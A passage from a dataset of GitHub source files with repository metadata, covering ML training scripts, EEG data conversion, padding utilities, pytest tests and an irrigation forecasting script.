and that image contains big enough portion of object's bbox\n valid = self.check_border(uniqs, cam_obs_) and self.check_border_soft(uniqs, cam_obs_, \n self.resolution,\n self.soft_border_check_enlargement,\n self.soft_border_check_treshold)\n if not valid: continue\n \n if self.soft_border_check_enlargement != 1:\n cam = self.create_camera(TWC, f, enlargement_factor=1)\n cam_obs_ = cam.get_state()\n mask = cam_obs_['mask']\n mask[mask == self.background._body_id] = 0\n mask[mask == 255] = 0\n uniqs = np.unique(cam_obs_['mask'])\n valid = len(uniqs) == len(self.bodies) + 1 and np.sum(mask) > 0\n if not valid: continue\n\n if self.border_check and not self.soft_border_check_enlargement:\n valid = self.check_border(uniqs, cam_obs_)\n if not valid: continue\n\n if self.area_check:\n valid = self.check_area(uniqs, cam_obs_, self.area_check)\n \n self.cam_obs = cam_obs_\n \n \n \n def objects_pos_orn_rand(self):\n self.hide_plane()\n for body in self.bodies:\n pos = np.zeros(3)\n orn = pin.Quaternion().coeffs()\n body.pose = pos, orn\n","repo_name":"cifkam/FocalPosePP","sub_path":"focalpose/recording/bop_recording_scene_nonparametric.py","file_name":"bop_recording_scene_nonparametric.py","file_ext":"py","file_size_in_byte":8630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18039359476","text":"# real data consumer\nfrom real import getData\n\nlocalData = [10,20,30]\ndata = getData()\n\nsum = localData[0] + localData[1] + localData[2]\n\nanswer = input('should include external data (y/n) ? ')\n\nif answer == 'y':\n sum += data[0]\n\nprint(sum) \n","repo_name":"soft7it/Django","sub_path":"patern/proxy_patern/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12660362848","text":"from os.path import basename\nfrom tempfile import NamedTemporaryFile\n\nimport argparse\nimport pandas as pd\nfrom tqdm import tqdm\nimport mne\nfrom mne_bids import BIDSPath, read_raw_bids, write_raw_bids\n\nfrom braindecode.datasets.sleep_physionet import SleepPhysionet\nfrom mne.datasets.sleep_physionet.age import fetch_data\n\n\ndef preprocess_and_save(\n raw_path_pair,\n preproc_bids_path,\n l_freq,\n h_freq,\n sfreq,\n to_microvolt=True,\n channels_to_keep=None,\n remove_ch_ref=False,\n crop_wake_mins=30,\n load_eeg_only=False\n):\n raw, desc = SleepPhysionet._load_raw(\n raw_path_pair[0], raw_path_pair[1], preload=True,\n load_eeg_only=load_eeg_only, crop_wake_mins=crop_wake_mins)\n # Preprocessing\n if to_microvolt:\n raw.apply_function(lambda x: x * 1e6, channel_wise=False, verbose=False)\n if channels_to_keep is not None:\n raw.pick_channels(channels_to_keep)\n if sfreq != raw.info['sfreq']:\n raw.resample(sfreq=sfreq, npad='auto', verbose=False)\n raw.filter(l_freq=l_freq, h_freq=h_freq, verbose=False)\n if remove_ch_ref:\n mapping = {name: name.split('-')[0] for name in raw.info['ch_names']}\n mne.rename_channels(raw.info, mapping)\n\n # Write new BIDS\n\n # Work around a limitation of MNE-BIDS: It won't allow us to save the\n # pre-loaded raw data to BIDS directly; so we're going to write the\n # data to a temporary file, which we are then going to pass to MNE-BIDS\n # for storage.\n # Use `_raw.fif` suffix to avoid MNE warnings.\n with NamedTemporaryFile(suffix='_raw.fif') as f:\n fname = f.name\n raw.save(fname, overwrite=True, verbose=False)\n raw = mne.io.read_raw_fif(fname, preload=False, verbose=False)\n 
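 # (editor's note) preload=False gives a file-backed Raw object, so the BIDS\n # writer below can copy the temporary FIF without keeping the full data in memory.\n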
write_raw_bids(raw, preproc_bids_path, overwrite=True, verbose=False)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Preprocess and save physionet sleep edf into bids.'\n )\n\n parser.add_argument(\n 'destination',\n type=str,\n help='Directory to use as root for the bids files created.'\n )\n\n args = parser.parse_args()\n\n preproc_bids_root = args.destination\n\n l_freq, h_freq = None, 30\n sfreq = 100\n for subject_id in tqdm(range(49, 83)):\n for recording_id in [1, 2]:\n try:\n path_pair = fetch_data(subjects=[subject_id], recording=[recording_id], on_missing='warn', verbose=False)[0]\n subject = basename(path_pair[0]).split('-')[0][:5]\n session = basename(path_pair[1]).split('-')[0][5:]\n preproc_bids_path = BIDSPath(\n subject=subject,\n session=session,\n root=preproc_bids_root,\n suffix='eeg',\n datatype='eeg'\n )\n preprocess_and_save(path_pair, preproc_bids_path, l_freq, h_freq, sfreq)\n except (IndexError, ValueError):\n print('error')","repo_name":"msolal/BT-sleep-EEG","sub_path":"converting_to_bids/sleep_physionet_to_bids.py","file_name":"sleep_physionet_to_bids.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7347306190","text":"def solution(n, words):\n count = 1\n man = 1\n last = words[0][0]\n dic = dict()\n for word in words:\n if word in dic or last != word[0]:\n return [man, count]\n dic[word] = 1\n man += 1\n last = word[-1]\n if man > n:\n man = 1\n count += 1\n return [0,0]","repo_name":"soulchicken/crush-programmers-cote","sub_path":"Python/Level_2/10_영어 끝말잇기.py","file_name":"10_영어 끝말잇기.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25551706278","text":"\"\"\"\nMade with love by tcapelle\n@wandbcode{pis_course}\n\"\"\"\n\nimport argparse\nfrom types import SimpleNamespace\nfrom fastprogress import progress_bar\nimport timm\nimport wandb\nimport torch\nfrom torch import nn\nfrom torch.optim import AdamW\nfrom torch.optim.lr_scheduler import OneCycleLR\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as T\nfrom torcheval.metrics import (\n BinaryAccuracy,\n BinaryF1Score,\n BinaryPrecision,\n BinaryRecall,\n Mean,\n)\nfrom utils import (\n get_data,\n ImageDataset,\n set_seed,\n to_device,\n save_model,\n log_model_preds,\n get_class_name_in_snake_case as snake_case,\n)\nimport params\n\n# Set the default configuration parameters for the experiment\ndefault_cfg = SimpleNamespace(\n image_size=256, # Image size\n batch_size=16, # Batch size\n seed=42, # Random seed\n epochs=10, # Number of training epochs\n learning_rate=2e-3, # Learning rate\n weight_decay=1e-5, # Weight decay\n model_arch=\"resnet18\", # Timm backbone architecture\n log_model=False, # Whether or not to log the model to Wandb\n log_preds=False, # Whether or not to log the model predictions to Wandb\n # these are params that are not being changed\n image_column=\"file_name\", # The name of the column containing the image file names\n target_column=\"mold\", # The name of the column containing the target variable\n PROJECT_NAME=params.PROJECT_NAME, # The name of the Wandb project\n ENTITY=params.ENTITY, # The Wandb username or organization name\n PROCESSED_DATA_AT=params.DATA_AT, # The path to the directory containing the preprocessed data\n)\n\n# Define the image data transformations\ntransforms = {\n \"train\": 
[T.Resize(default_cfg.image_size), T.ToTensor(), T.RandomHorizontalFlip()],\n \"valid\": [T.Resize(default_cfg.image_size), T.ToTensor()],\n}\n\n# Override the default configuration parameters with any command-line arguments\ndef parse_args(default_cfg):\n \"Overriding default argments\"\n parser = argparse.ArgumentParser(description=\"Process hyper-parameters\")\n parser.add_argument(\"--image_size\", type=int, default=default_cfg.image_size, help=\"image size\")\n parser.add_argument(\"--batch_size\", type=int, default=default_cfg.batch_size, help=\"batch size\")\n parser.add_argument(\"--seed\", type=int, default=default_cfg.seed, help=\"random seed\")\n parser.add_argument(\"--epochs\",type=int,default=default_cfg.epochs, help=\"number of training epochs\")\n parser.add_argument(\"--learning_rate\", type=float, default=default_cfg.learning_rate, help=\"learning rate\")\n parser.add_argument(\"--weight_decay\", type=float, default=default_cfg.weight_decay, help=\"weight decay\")\n parser.add_argument(\"--model_arch\", type=str, default=default_cfg.model_arch, help=\"timm backbone architecture\")\n parser.add_argument(\"--log_model\", action=\"store_true\", help=\"log model to wandb\")\n parser.add_argument(\n \"--log_preds\", action=\"store_true\", help=\"log model predictions to wandb\"\n )\n args = vars(parser.parse_args())\n\n # update config with parsed args\n for k, v in args.items():\n setattr(default_cfg, k, v)\n\n# Define the ClassificationTrainer class for training the model\nclass ClassificationTrainer:\n \"\"\"\n A class for training a classification model. It is used to train a model \n on a training set and validate it on a validation set. This class is\n inspired by the Keras API.\n\n Args:\n train_dataloader (torch.utils.data.DataLoader): A PyTorch DataLoader for the training set\n valid_dataloader (torch.utils.data.DataLoader): A PyTorch DataLoader for the validation set\n model (torch.nn.Module): A PyTorch model\n metrics (list): A list of metrics to be used for training and validation, \n we are using torcheval.metrics\n device (str): The device to be used for training, either \"cpu\" or \"cuda\"\n \"\"\"\n def __init__(\n self, train_dataloader, valid_dataloader, model, metrics, device=\"cuda\"\n ):\n self.device = torch.device(device)\n self.model = model.to(self.device)\n self.train_dataloader = train_dataloader\n self.valid_dataloader = valid_dataloader\n self.train_metrics = [m(device=self.device) for m in metrics]\n self.valid_metrics = [m(device=self.device) for m in metrics]\n self.loss = Mean(device=device)\n\n def loss_func(self, x, y):\n \"A flattened version of nn.BCEWithLogitsLoss\"\n loss_func = nn.BCEWithLogitsLoss()\n return loss_func(x.squeeze(), y.squeeze().float())\n\n def compile(self, epochs=5, learning_rate=2e-3, weight_decay=0.01):\n \"Keras style compile method\"\n self.epochs = epochs\n self.optim = AdamW(self.model.parameters(), lr=learning_rate, weight_decay=weight_decay)\n self.schedule = OneCycleLR(\n self.optim,\n max_lr=learning_rate,\n pct_start=0.1,\n total_steps=epochs * len(self.train_dataloader),\n )\n\n def reset_metrics(self):\n \"Reset the metrics after each epoch\"\n self.loss.reset()\n for m in self.train_metrics:\n m.reset()\n for m in self.valid_metrics:\n m.reset()\n\n def train_step(self, loss):\n \"Perform a single training step\"\n self.optim.zero_grad()\n loss.backward()\n self.optim.step()\n self.schedule.step()\n return loss\n\n def one_epoch(self, train=True):\n \"Perform a single epoch of training or validation\"\n if 
train:\n self.model.train()\n dl = self.train_dataloader\n else:\n self.model.eval()\n dl = self.valid_dataloader\n pbar = progress_bar(dl, leave=False)\n preds = []\n for b in pbar:\n with torch.inference_mode() if not train else torch.enable_grad():\n images, labels = to_device(b, self.device)\n preds_b = self.model(images).squeeze()\n loss = self.loss_func(preds_b, labels)\n self.loss.update(loss)\n preds.append(preds_b)\n if train:\n self.train_step(loss)\n for m in self.train_metrics:\n m.update(preds_b, labels.long())\n wandb.log(\n {\n \"train_loss\": loss.item(),\n \"learning_rate\": self.schedule.get_last_lr()[0],\n }\n )\n else:\n for m in self.valid_metrics:\n m.update(preds_b, labels.long())\n pbar.comment = f\"train_loss={loss.item():2.3f}\"\n\n return torch.cat(preds, dim=0), self.loss.compute()\n\n def print_metrics(self, epoch, train_loss, val_loss):\n \"Print the metrics after each epoch\"\n print(f\"Epoch {epoch+1}/{self.epochs} - train_loss: {train_loss.item():2.3f} - val_loss: {val_loss.item():2.3f}\")\n\n # Fit the model\n def fit(self, log_preds=False):\n \"Fit the model for the specified number of epochs\"\n for epoch in progress_bar(range(self.epochs), total=self.epochs, leave=True):\n # train epoch\n _, train_loss = self.one_epoch(train=True)\n wandb.log({f\"train_{snake_case(m)}\": m.compute() for m in self.train_metrics})\n\n ## validation epoch\n val_preds, val_loss = self.one_epoch(train=False)\n wandb.log(\n {f\"valid_{snake_case(m)}\": m.compute() for m in self.valid_metrics},\n commit=False,\n )\n wandb.log({\"valid_loss\": val_loss.item()}, commit=False)\n self.print_metrics(epoch, train_loss, val_loss)\n self.reset_metrics()\n if log_preds:\n log_model_preds(self.valid_dataloader, val_preds)\n\n# Train the model with the specified configurations\ndef train(cfg):\n \"Train the model\"\n with wandb.init(\n project=cfg.PROJECT_NAME, entity=cfg.ENTITY, job_type=\"training\", config=cfg\n ):\n set_seed(cfg.seed)\n\n cfg = wandb.config\n df, processed_dataset_dir = get_data(cfg.PROCESSED_DATA_AT)\n\n # Create training and validation datasets\n train_ds = ImageDataset(\n df[~df.valid],\n processed_dataset_dir,\n image_column=cfg.image_column,\n target_column=cfg.target_column,\n transform=transforms[\"train\"],\n )\n\n valid_ds = ImageDataset(\n df[df.valid],\n processed_dataset_dir,\n image_column=cfg.image_column,\n target_column=cfg.target_column,\n transform=transforms[\"valid\"],\n )\n\n # Define training and validation dataloaders\n train_dataloader = DataLoader(\n train_ds, batch_size=cfg.batch_size, shuffle=True, pin_memory=True, num_workers=6\n )\n valid_dataloader = DataLoader(\n valid_ds, batch_size=cfg.batch_size, shuffle=False, num_workers=4\n )\n\n # Create the model using timm library. 
We will use a pretrained model.\n model = timm.create_model(cfg.model_arch, pretrained=True, num_classes=1)\n\n # Define the trainer object\n trainer = ClassificationTrainer(\n train_dataloader,\n valid_dataloader,\n model,\n metrics=[BinaryAccuracy, BinaryPrecision, BinaryRecall, BinaryF1Score],\n device=\"cuda\",\n )\n # Setup the optimizer and loss function\n trainer.compile(epochs=cfg.epochs, learning_rate=cfg.learning_rate, weight_decay=cfg.weight_decay)\n\n # Fit the model\n trainer.fit(log_preds=cfg.log_preds)\n if cfg.log_model:\n save_model(trainer.model, cfg.model_arch)\n\nif __name__ == \"__main__\":\n parse_args(default_cfg)\n train(default_cfg)\n","repo_name":"wandb/edu","sub_path":"pyimagesearch/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10088,"program_lang":"python","lang":"en","doc_type":"code","stars":310,"dataset":"github-code","pt":"61"} +{"seq_id":"36200192328","text":"from comet_ml import Experiment # Comet.ml can log training metrics, parameters, do version control and parameter optimization\nimport torch # PyTorch to create and apply deep learning models\nimport dask.dataframe as dd # Dask to handle big data in dataframes\nimport numpy as np # NumPy to handle numeric and NaN operations\nimport warnings # Print warnings for bad practices\nfrom . import utils # Generic and useful methods\nfrom . import search_explore # Methods to search and explore data\nfrom . import embedding # Embeddings and other categorical features handling methods\n\n# Ignore Dask's 'meta' warning\nwarnings.filterwarnings(\"ignore\", message=\"`meta` is not specified, inferred from partial data. Please provide `meta` if the result is unexpected.\")\n\n# Methods\n\ndef get_sequence_length_dict(df, id_column='subject_id', ts_column='ts'):\n '''Creates a dictionary with the original sequence lengths of a dataframe.\n\n Parameters\n ----------\n df : pandas.DataFrame or dask.DataFrame\n Data in a Pandas dataframe format which will be padded and converted\n to the requested data type.\n id_column : string or int, default 'subject_id'\n Name of the column which corresponds to the subject identifier in the\n dataframe.\n ts_column : string or int, default 'ts'\n Name of the column which corresponds to the timestamp in the\n dataframe.\n\n Returns\n -------\n seq_len_dict : dictionary, default None\n Dictionary containing the original sequence lengths of the dataframe.\n The keys should be the sequence identifiers (the numbers obtained from\n the id_column) and the values should be the length of each sequence.\n '''\n if isinstance(id_column, int) and isinstance(ts_column, int):\n # Convert the column indices to the column names\n column_names = list(df.columns)\n id_column = column_names[id_column]\n ts_column = column_names[ts_column]\n # Dictionary containing the sequence length (number of temporal events) of each sequence (patient)\n seq_len_df = df.groupby(id_column)[ts_column].count()\n seq_len_dict = dict([(idx, val) for idx, val in list(zip(seq_len_df.index, seq_len_df.to_numpy()))])\n return seq_len_dict\n\n\ndef dataframe_to_padded_tensor(df, seq_len_dict=None, id_column='subject_id',\n ts_column='ts', label_column='label',\n bool_feat=None, data_type='PyTorch',\n padding_value=999999, total_length=None,\n inplace=False):\n '''Converts a Pandas dataframe into a padded NumPy array or PyTorch Tensor.\n\n Parameters\n ----------\n df : pandas.DataFrame or dask.DataFrame\n Data in a Pandas dataframe format which will be padded and converted\n to the requested data type.\n 
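    As an illustrative aside (toy frame, values invented): `get_sequence_length_dict`
    defined above maps each sequence identifier to its number of time steps:

    >>> import pandas as pd
    >>> toy = pd.DataFrame({'subject_id': [0, 0, 1], 'ts': [0, 1, 0]})
    >>> d = get_sequence_length_dict(toy)
    >>> int(d[0]), int(d[1])
    (2, 1)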
seq_len_dict : dictionary, default None\n Dictionary containing the original sequence lengths of the dataframe.\n The keys should be the sequence identifiers (the numbers obtained from\n the id_column) and the values should be the length of each sequence.\n id_column : string, default 'subject_id'\n Name of the column which corresponds to the subject identifier in the\n dataframe.\n ts_column : string, default 'ts'\n Name of the column which corresponds to the timestamp in the\n dataframe.\n bool_feat : string or list of strings, default None\n Name(s) of the boolean feature(s) of the dataframe. In order to prevent\n confounding padding values with encodings, these features must have\n their padding values replaced with 0. If not specified, the method\n will automatically look for boolean columns in the dataframe. If you\n don't want any feature to be treated as a boolean dtype, set `bool_feat=[]`\n data_type : string, default 'PyTorch'\n Indication of what kind of output data type is desired. In case it's\n set as 'NumPy', the function outputs a NumPy array. If it's 'PyTorch',\n the function outputs a PyTorch tensor.\n padding_value : numeric\n Value to use in the padding, to fill the sequences.\n total_length : int, default None\n If not None, the output will be padded to have length total_length.\n This method will throw ValueError if total_length is less than the\n max sequence length in sequence.\n inplace : bool, default False\n If set to True, the original dataframe will be used and modified\n directly. Otherwise, a copy will be created and returned, without\n changing the original dataframe.\n\n Returns\n -------\n arr : torch.Tensor or numpy.ndarray\n PyTorch tensor or NumPy array version of the dataframe, after being\n padded with the specified padding value to have a fixed sequence\n length.\n '''\n if not inplace:\n # Make a copy of the data to avoid potentially unwanted changes to the original dataframe\n data_df = df.copy()\n else:\n # Use the original dataframe\n data_df = df\n if seq_len_dict is None:\n # Find the sequence lengths and store them in a dictionary\n seq_len_dict = get_sequence_length_dict(data_df, id_column, ts_column)\n # Fetch the number of unique sequence IDs\n n_ids = data_df[id_column].nunique()\n if isinstance(df, dd.DataFrame):\n # Make sure that the number of unique values are computed, in case we're using Dask\n n_ids = n_ids.compute()\n # Get the number of columns in the dataframe\n n_inputs = len(data_df.columns)\n if total_length is None:\n # Max sequence length in the current data\n total_length = seq_len_dict[max(seq_len_dict, key=seq_len_dict.get)]\n if n_ids > 1:\n # Making a padded numpy array version of the dataframe (all index has the same sequence length as the one with the max)\n arr = np.ones((n_ids, total_length, n_inputs)) * padding_value\n # Fetch a list with all the unique identifiers (e.g. 
each patient in the dataset)\n unique_ids = data_df[id_column].unique()\n # Iterator that outputs each unique identifier\n id_iter = iter(unique_ids)\n # Count the iterations of ids\n count = 0\n # Assign each value from the dataframe to the numpy array\n for idt in id_iter:\n arr[count, :seq_len_dict[idt], :] = data_df[data_df[id_column] == idt].to_numpy()\n arr[count, seq_len_dict[idt]:, :] = padding_value\n count += 1\n else:\n # Making a padded numpy array version of the dataframe (all index has the same sequence length as the one with the max)\n arr = np.ones((total_length, n_inputs)) * padding_value\n # Assign each value from the dataframe to the numpy array\n idt = data_df[id_column].iloc[0]\n arr[:seq_len_dict[idt], :] = data_df.to_numpy()\n arr[seq_len_dict[idt]:, :] = padding_value\n if bool_feat is None:\n # Find the boolean columns in the dataframe\n bool_feat = search_explore.list_boolean_columns(data_df)\n # Make sure that none of the ID columns are considered boolean\n bool_feat = list(set(bool_feat) - set([id_column, ts_column, label_column]))\n # Get the indices of the boolean features\n bool_feat = [search_explore.find_col_idx(data_df, feature) for feature in bool_feat]\n elif isinstance(bool_feat, str):\n # Get the index of the boolean feature\n bool_feat = search_explore.find_col_idx(data_df, bool_feat)\n # Make sure that the boolean feature names are in a list format\n bool_feat = [bool_feat]\n elif not isinstance(bool_feat, list):\n raise Exception(f'ERROR: The `bool_feat` argument must be specified as either a single string or a list of strings. Received input with type {type(bool_feat)}.')\n elif all(isinstance(feat, str) for feat in bool_feat):\n # Convert from the feature's name to its index\n bool_feat = [search_explore.find_col_idx(data_df, feat) for feat in bool_feat]\n if len(bool_feat) > 0:\n if n_ids > 1:\n # Iterator that outputs each unique identifier\n id_iter = iter(unique_ids)\n # Count the iterations of ids\n count = 0\n # Replace each padding value in the boolean features with zero\n for idt in id_iter:\n arr[count, seq_len_dict[idt]:, bool_feat] = 0\n count += 1\n else:\n # Replace each padding value in the boolean features with zero\n idt = data_df[id_column].iloc[0]\n arr[seq_len_dict[idt]:, bool_feat] = 0\n # Make sure that the data type asked for is a string\n if not isinstance(data_type, str):\n raise Exception('ERROR: Please provide the desirable data type in a string format.')\n if data_type.lower() == 'numpy':\n return arr\n elif data_type.lower() == 'pytorch':\n return torch.from_numpy(arr)\n else:\n raise Exception('ERROR: Unavailable data type. Please choose either NumPy or PyTorch.')\n\n\ndef sort_by_seq_len(data, seq_len_dict, labels=None, id_column=0):\n '''Sort the data by sequence length in order to correctly apply it to a\n PyTorch neural network.\n\n Parameters\n ----------\n data : torch.Tensor\n Data tensor on which sorting by sequence length will be applied.\n seq_len_dict : dict\n Dictionary containing the sequence lengths for each index of the\n original dataframe. 
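    A hedged usage sketch for `dataframe_to_padded_tensor` above (toy data,
    column values invented purely for illustration):

    >>> import pandas as pd
    >>> toy = pd.DataFrame({'subject_id': [0, 0, 1],
    ...                     'ts': [0, 1, 0],
    ...                     'label': [0, 1, 1]})
    >>> arr = dataframe_to_padded_tensor(toy, data_type='NumPy')
    >>> arr.shape   # 2 sequences, padded to the longest length (2 steps)
    (2, 2, 3)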
This allows to ignore the padding done in\n the fixed sequence length tensor.\n labels : torch.Tensor, default None\n Labels corresponding to the data used, either specified in the input\n or all the data that the interpreter has.\n id_column : int, default 0\n Number of the column which corresponds to the subject identifier in\n the data tensor.\n\n Returns\n -------\n sorted_data : torch.Tensor, default None\n Data tensor already sorted by sequence length.\n sorted_labels : torch.Tensor, default None\n Labels tensor already sorted by sequence length. Only outputed if the\n labels data is specified in the input.\n x_lengths : list of int\n Sorted list of sequence lengths, relative to the input data.\n '''\n # Get the original lengths of the sequences, for the input data\n x_lengths = [seq_len_dict[id] for id in list(data[:, 0, id_column].numpy())]\n is_sorted = all(x_lengths[i] >= x_lengths[i+1] for i in range(len(x_lengths)-1))\n if is_sorted is True:\n # Do nothing if it's already sorted\n sorted_data = data\n sorted_labels = labels\n else:\n # Sorted indices to get the data sorted by sequence length\n data_sorted_idx = list(np.argsort(x_lengths)[::-1])\n # Sort the x_lengths array by descending sequence length\n x_lengths = [x_lengths[idx] for idx in data_sorted_idx]\n # Sort the data by descending sequence length\n sorted_data = data[data_sorted_idx, :, :]\n if labels is not None:\n # Sort the labels by descending sequence length\n sorted_labels = labels[data_sorted_idx, :]\n if labels is None:\n return sorted_data, x_lengths\n else:\n return sorted_data, sorted_labels, x_lengths\n\n\ndef pad_list(x_list, length, padding_value=999999):\n '''Pad a list with a specific padding value until the desired length is\n met.\n\n Parameters\n ----------\n x_list : list\n List which will be padded.\n length : int\n Desired length for the final padded list.\n padding_value : numeric\n Value to use in the padding, to fill the sequences.\n\n Returns\n -------\n x_list : list\n Resulting padded list'''\n return x_list + [padding_value] * (length - len(x_list))\n","repo_name":"AndreCNF/data-utils","sub_path":"data_utils/padding.py","file_name":"padding.py","file_ext":"py","file_size_in_byte":12057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42842996752","text":"import pandas as pd\nimport os\nimport pytest\nimport numpy as np\nimport pytest\nfrom app.gui.file_window import FileWindow\nfrom app.data.compute_statistics import getSummaryStatistics, getHistogramData\nfrom app.data.construct_metrics import Metrics\n\n@pytest.fixture\ndef file_window(qtbot):\n# Create a FileWindow instance for testing and show it\n file_window = FileWindow(None)\n file_window.show()\n# Test that the browseFile method opens the file dialog\n with qtbot.waitSignal(file_window.ui.pathToFileTextbox.textChanged):\n file_window.browseFile()\n assert file_window.filename != ''\n\n# Test that the loadFile method loads the file correctly\n file_window.loadFile()\n assert file_window.data is not None\n qtbot.addWidget(file_window)\n return file_window\n \n\ndef test_is_valid_file(qtbot, file_window, monkeypatch):\n # Test if the file is valid\n filename = \"CSV Files (*.csv)\"\n file_window.filename = filename\n def mock_return(*args, **kwargs):\n return True\n monkeypatch.setattr(os.path, \"isfile\", mock_return)\n \n\ndef test_invalid_file(qtbot, file_window, monkeypatch):\n # Test if the file is invalid\n filename = \"TXT Files (*.txt)\"\n file_window.filename = 
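# A self-contained sketch of the monkeypatch pattern these tests rely on:
# setattr swaps os.path.isfile for the duration of one test and pytest
# restores the real function afterwards (the path below is made up).
import os

def test_isfile_patched(monkeypatch):
    monkeypatch.setattr(os.path, "isfile", lambda *args, **kwargs: True)
    assert os.path.isfile("made/up/path.csv")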
filename\n def mock_return(*args, **kwargs):\n return False\n monkeypatch.setattr(os.path, \"isfile\", mock_return)\n \n\n\n# Create some test data\ndata = pd.DataFrame({\n 'metric1': np.random.rand(100),\n 'metric2': np.random.rand(100),\n 'metric3': np.random.rand(100),\n})\n\ndef test_getSummaryStatistics():\n # Test that the function returns a DataFrame\n result = getSummaryStatistics(data)\n assert isinstance(result, pd.DataFrame)\n\n # Test that the DataFrame has the expected columns\n expected_columns = ['Median', '25th', 'Mean', '75th', 'Stdev', 'Min', 'Max']\n assert result.columns.tolist() == expected_columns\n\n # Test that the DataFrame has the expected index\n expected_index = data.columns.tolist()\n assert result.index.tolist() == expected_index\n\n\n\ndef test_getHistogramData():\n # Test that the function returns a Series\n metric = data.columns[0]\n result = getHistogramData(data, metric)\n assert isinstance(result, pd.Series)\n\n # Test that the Series has the expected length\n expected_length = len(data)\n assert len(result) == expected_length\n\n # Test that the values are numeric\n assert result.dtype == 'float64'\n\n# Fixture for Metrics object\n@pytest.fixture(scope='module')\ndef metrics_obj():\n # Load test data\n path_to_test_data = os.path.join(os.getcwd(), 'tests', 'F2020.csv')\n # Create a Metrics object\n return Metrics(path_to_test_data)\n\n# Test for constructMetricsTable method\ndef test_constructMetricsTable(metrics_obj):\n # Test the output of the method\n metrics_obj.constructMetricsTable()\n df = metrics_obj.get_datatable()\n assert 'lifespan' in df.columns\n assert 'A' in df.columns\n assert 'B' in df.columns\n assert 'C' in df.columns\n assert 'D' in df.columns\n assert 'E' in df.columns\n assert 'F' in df.columns\n assert 'G' in df.columns\n assert 'H' in df.columns\n assert 'I' in df.columns\n assert 'J' in df.columns\n assert 'K' in df.columns\n assert 'L' in df.columns\n assert 'M' in df.columns\n assert df.shape == (52, 15)\n","repo_name":"anguyen216/pyqt_UI","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40174083726","text":"import pandas\nimport sys\nimport datetime\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn import metrics\n\nfrom statsmodels.tsa.arima.model import ARIMA, ARIMAResultsWrapper\n\nfrom sqlalchemy import select\nfrom sqlalchemy.sql import func\n\nfrom models.irrigate import Irrigate\nfrom models.irrigate_predictions import IrrigatePredictions\n\nfrom utils.get_arguments import get_arguments\nfrom utils.get_session_engine import get_session_engine\nfrom constants.constants import MIN_SCORE_ESTIMATOR\n\narguments = get_arguments()\n\nengine, session = get_session_engine(\n user=arguments[\"--user\"], password=arguments[\"--password\"],\n host=arguments[\"--host\"], database=arguments[\"--database\"]\n)\n\nstmt = select(Irrigate).where(Irrigate.createdAt < func.now())\nirrigates = session.scalars(stmt).all()\n\ndataX = []\ndataY = []\n\nfor irrigate in irrigates:\n dataX.append(\n [\n irrigate.lengthMinutes,\n irrigate.createdAt.year,\n irrigate.createdAt.month,\n irrigate.createdAt.day,\n irrigate.FarmableLandId\n ]\n )\n dataY.append(\n irrigate.amountWater,\n )\n\nX = pandas.DataFrame(\n dataX,\n columns=[\n 
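# Hedged aside: the remainder of this script fits an MLP pipeline and an
# ARIMA model, scores both with R^2, and keeps the better one. A
# self-contained sketch of that selection pattern on synthetic data (all
# names below are local to this sketch, not part of the script):
import numpy as np
from sklearn.dummy import DummyRegressor
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
from sklearn.model_selection import train_test_split

Xs = np.arange(100, dtype=float).reshape(-1, 1)
ys = 3.0 * Xs.ravel() + np.random.default_rng(0).normal(0.0, 1.0, 100)
Xtr, Xte, ytr, yte = train_test_split(Xs, ys, random_state=42)
best = max(
    (LinearRegression().fit(Xtr, ytr), DummyRegressor().fit(Xtr, ytr)),
    key=lambda m: r2_score(yte, m.predict(Xte)),
)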
'lengthMinutes', 'year', 'month', 'day', 'FarmableLandId'\n ]\n)\n\ny = pandas.Series(\n dataY\n)\n\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, random_state=42, test_size=0.20\n)\n\nmplregr = MLPRegressor(\n hidden_layer_sizes=[50, 20],\n learning_rate='adaptive',\n alpha=0.1,\n max_iter=3000,\n)\nneural_estimator = Pipeline(\n [\n ('std', StandardScaler()),\n ('mplregr', mplregr)\n ]\n)\nneural_estimator.fit(X_train, y_train)\nneural_estimator_score = neural_estimator.score(X_test, y_test)\n\ntime_series_arima = ARIMA(y_train)\ntime_series_arima_fit = time_series_arima.fit()\ntime_series_arima_predictions = time_series_arima_fit.predict(\n start=len(X_train),\n end=len(X_train) + len(X_test) - 1\n)\ntime_series_arima_score = metrics.r2_score(\n y_test,\n time_series_arima_predictions\n)\n\nprint(\n 'The R^2 Score of the Neural Network estimator is =>',\n neural_estimator_score\n)\n\nprint(\n 'The R^2 Score of the ARIMA estimator is =>',\n time_series_arima_score\n)\n\nneural_condition = neural_estimator_score < MIN_SCORE_ESTIMATOR\narima_condition = time_series_arima_score < MIN_SCORE_ESTIMATOR\nif neural_condition and arima_condition:\n sys.exit(\n \"The score of estimator is under \" +\n str(MIN_SCORE_ESTIMATOR) + \". Aborting!\"\n )\n\nestimators = [\n {'name': 'neural', 'pipeline_estimator': neural_estimator}\n]\n\nif time_series_arima_score > neural_estimator_score:\n estimators = [\n {'name': 'neural', 'pipeline_estimator': time_series_arima_fit}\n ]\n print('Using time series arima estimator...')\nelse:\n estimators = [\n {'name': 'neural', 'pipeline_estimator': neural_estimator}\n ]\n print('Using neural network estimator...')\n\ndays = int(arguments[\"--days\"])\n\nfor estimator in estimators:\n for day in range(1, days + 1):\n lengthMinutes = arguments[\"--lengthMinutes\"]\n farmableLandId = 